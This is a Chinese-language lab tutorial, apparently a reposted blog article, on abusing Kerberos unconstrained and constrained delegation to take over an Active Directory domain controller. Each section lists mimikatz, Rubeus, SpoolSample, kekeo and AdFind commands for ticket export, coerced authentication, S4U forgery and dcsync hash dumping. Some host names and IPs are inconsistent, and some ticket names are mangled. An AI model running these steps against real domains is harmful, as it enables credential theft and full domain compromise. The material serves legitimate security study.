委派攻擊
目錄- 委派攻擊
- 一、委派概述
- 二、委派分類
- 三、非約束委派域控主動訪問控制域控
- 四、非約束委派域控被動訪問控制域控
- 五、約束委派構造服務賬戶票據控制域控
- 六、約束委派構造機器賬戶票據控制域控
一、委派概述
域委派是指將域內用戶的權限委派給服務賬戶,使得服務賬號能夠以用戶的權限在域內展開活動,在域內只有主機賬號和服務賬號才有委派屬性,
主機賬號:活動目錄中的computers組內的計算機,也被稱為機器賬號,
服務賬號:域內用戶的一種型別,是服務器運行服務時所用的賬號,將服務運行起來加入域內,比如: SQLServer,MYSQL等,域用戶通過注冊SPN也能成為服務賬號,
創建服務賬號方式:
net user test123 Admin@123 /add /domain 創建一個普通用戶
setspn -U -A priv/test test123 注冊為服務賬號
二、委派分類
1、非約束性委派
2、約束性委派
3、基于資源的約束性委派
三、非約束委派域控主動訪問控制域控
1、實驗環境
| 機器位置 | 機器IP | 機器名 | 機器登錄用戶 | 所屬域 | 委派配置 |
|---|---|---|---|---|---|
| 域內域控制器 | 192.168.142.10 | DC1 | candada\administrator | candada | 域控 |
| 域內機器 | 192.168142.31 | win10-1 | candada\dc1-can | candada | 非約束委派 |
實驗前提:控制了域內的一臺機器win10-1,并且該機器的主機賬號配置了非約束委派,
2、實驗步驟
(1)使用Adfind查詢域內非約束委派機器賬號
AdFind.exe -b "DC=candada,DC=com" -f "(&(samAccountType=805306369) (userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
(2)使用Adfind查詢域內非約束委派的服務賬號
AdFind.exe -b "DC=candada,DC=com" -f "(&(samAccountType=805306368) (userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn
(3)等待域控訪問win10-2
(4)在win10-2機器匯出記憶體中的票據
mimikatz sekurlsa::tickets /export
(5)進行票據傳遞就可以獲取域控的權限
mimikatz kerberos::ptt [0;80d194][email protected]
(6)訪問域控
(7)使用計劃任務,服務,或者無檔案的powershell上線
四、非約束委派域控被動訪問控制域控
1、實驗環境
| 機器位置 | 機器IP | 機器名 | 機器登錄用戶 | 所屬域 | 委派配置 |
|---|---|---|---|---|---|
| 域內域控制器 | 192.168.142.10 | DC1 | candada\administrator | candada | 域控 |
| 域內機器 | 192.168142.31 | win10-1 | candada\dc1-can | candada | 非約束委派 |
實驗前提:控制了域內的一臺機器win10-1,并且該機器的主機賬號配置了非約束委派,
2、實驗步驟
(1)首先利用Rubeus在win10-2上以本地管理員權限執行以下命令,每隔一秒監聽來自域控機器DC2的登錄資訊
Rubeus.exe monitor /interval:1 /filteruser:DC1$
Rubeus.exe monitor /interval:1 /filteruser: DC1$ #加個空格效果不同
(2)再利用SpoolSample強制域控列印機回連,需在域用戶行程上執行,所以這里切換成了普通域用戶帳號去執行
SpoolSample.exe DC2 win10-2
(3)Rubeus匯入票據,這里匯入用戶權限不同,后續的操作不同
Rubeus.exe ptt /ticket:票據
(4)獲取域內用戶的hash
mimikatz lsadump::dcsync /all /csv
(5)如果當前的用戶是管理員就可以使用PTH攻擊,如果是普通的域用戶就使用黃金票據
五、約束委派構造服務賬戶票據控制域控
1、實驗環境
| 機器位置 | 機器IP | 機器名 | 機器登錄用戶 | 所屬域 | 委派配置 |
|---|---|---|---|---|---|
| 域內域控制器 | 192.168.142.20 | DC2 | test\administrator | test | 域控 |
| 域內機器 | 192.168142.32 | win10-2 | test\dc2-can | test | 非約束委派 |
實驗前提:
(1)服務賬戶設定了約束性委派
(2)已知服務賬戶的密碼口令資訊
2、實驗步驟
(1)使用 adfind發現服務賬號test設定了約束委派
AdFind.exe -b "DC=test,DC=candada,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
(2)構造服務賬戶TGT的票據
kekeo.exe "tgt::ask /user:test /domain:test.candada.com /password:admin@123 /ticket:test.kirbi" "exit"
(3)利用剛才偽造的TGT票據,向域服務器申請CIFS服務票據
shell kekeo.exe "tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/dc2.test.candada.com" "exit"
(4)使用mimikatz將該票據注入當前的會話中
mimikatz kerberos::ptt [email protected]@TEST.CANDADA.COM_cifs~dc2.test.candada.com@TEST.CANDADA.COM.kirbi
(5)訪問域控
六、約束委派構造機器賬戶票據控制域控
1、實驗環境
| 機器位置 | 機器IP | 機器名 | 機器登錄用戶 | 所屬域 | 委派配置 |
|---|---|---|---|---|---|
| 域內域控制器 | 192.168.142.10 | DC1 | candada\administrator | candada | 域控 |
| 域內機器 | 192.168142.31 | win10-1 | candada\dc1-can | candada | 約束委派 |
實驗前提:我們已經控制了win10-1的電腦,發現該電腦配置了約束性委派,并且可以讀取到該電腦的機器用戶的NTLM哈希,
2、實驗步驟
(1)查詢約束性委派的機器用戶
AdFind.exe -b "DC=candada,DC=com" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto
(2)查詢約束性委派的服務用戶
AdFind.exe -b "DC=candada,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
(3)使用mimikatz獲取win10-1機器賬戶NTLM哈希
mimikatz sekurlsa::logonpasswords
(4)使用kekeo申請配置了約束委派機器賬戶win10-1$的TGT
kekeo.exe "tgt::ask /user:win10-1$ /NTLM:a9197ef923b9205592cfdea8232c279c /domain:candada.com" "exit"
(5)利用TGT通過偽造S4U請求以administrator身份訪問win10-1的ST
shell kekeo.exe "tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/dc1.candada.com" "exit"
(6)使用mimkatz注入
mimikatz kerberos::ptt [email protected]@[email protected]
(7)訪問域控
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/556144.html
標籤:其他
下一篇:返回列表